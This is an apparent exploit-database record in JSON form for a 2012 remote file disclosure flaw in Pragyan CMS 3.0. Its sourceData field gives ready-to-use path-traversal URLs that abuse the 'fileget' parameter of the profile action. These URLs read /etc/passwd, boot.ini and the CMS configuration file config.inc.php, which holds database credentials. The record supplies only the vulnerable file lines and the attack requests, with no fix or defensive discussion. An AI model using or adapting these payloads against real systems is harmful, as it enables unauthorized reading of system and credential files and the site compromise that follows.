{"id": "1337DAY-ID-17362", "lastseen": "2018-03-09T23:31:27", "viewCount": 3, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2018-03-09T23:31:27", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:17362"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231019498"]}], "modified": "2018-03-09T23:31:27", "rev": 2}, "vulnersScore": 1.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/17362", "description": "Exploit for php platform in category web applications", "title": "Pragyan CMS v 3.0 Remote File Disclosure", "cvelist": [], "sourceData": "Title \r\nPragyan CMS v 3.0 => [Remote File Disclosure]\r\nAuthor \r\nOr4nG.M4n\r\nDownload\r\nhttp://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2\r\n \r\nvuln\r\ndownload.lib.php line 16\r\nvuln\r\nindex.php line 234\r\n \r\n$_GET['fileget']\r\n \r\nexploit http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../ etc/passwd . boot.ini\r\n \r\nDownload Config file\r\nexploit /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php\r\nexploit /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php\r\n\r\n\n\n# 0day.today [2018-03-09] #", "published": "2012-01-10T00:00:00", "references": [], "reporter": "Or4nG.M4N", "modified": "2012-01-10T00:00:00", "href": "https://0day.today/exploit/description/17362"}

{}